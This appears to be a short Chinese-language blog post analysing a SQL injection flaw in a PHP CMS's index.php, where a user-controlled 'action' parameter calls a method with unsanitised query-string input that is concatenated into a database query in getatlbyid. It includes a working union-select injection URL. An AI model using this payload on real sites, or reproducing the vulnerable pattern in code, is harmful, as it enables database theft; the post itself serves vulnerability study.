这个漏洞不是我发现的,看到了,就拿来分析一下。
漏洞描述:
/index.php 文件中path 文件中的path 变量,由query_string 获取,可无视GPC,
action是要执行的函数,在这里,可以自己来控制要进入的函数,最终导致可以构造这样的结构去注入:
http://[host]/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,user(),10,11%23&action=getatlbyid。
include(SYS_ROOT.INC.'common.php'); //包含文件
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
//获取QUERY_STRING,简单加工后赋值给 $path
if(substr($path, 0,1)=='/'){ // 这个意思是去掉第一个‘/’么
$path=substr($path,1);
}
$ctrl=isset($_GET['action'])?$_GET['action']:'run'; //检测是否设置action 变量,然后设置$ctrl
if(isset($_GET['createprocess'])) //检测是否设置 creatprocess 变量
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}
else
{ //没有设置,那么在这里执行$ctrl ,参数是我们构造的sql语句啦
Index::$ctrl($path);
}
这里作者为什么用getatlbyid() 这个函数。我们也看看
static public function getatlbyid($id){
if(!$id)return null; //判断是否
self::$_db=new Dbclass(SYS_ROOT.DB_NAME);
if(MEMCACHE){
self::$_mem=new Memcached(MEMCACHE);
if(!$atl=self::$_mem->get($id.'_cms')){
$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);;
self::$_mem->set($id.'_cms',$atl);
}
}else{
$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);
}
return $atl;
}
把我们的输入放入atl了,但最后应该会进入数据库查查。否则怎么,注入。
嗯。就是这样,php 不太熟悉,都是个人理解。要是哪里有错误,各位看客请帮忙指出。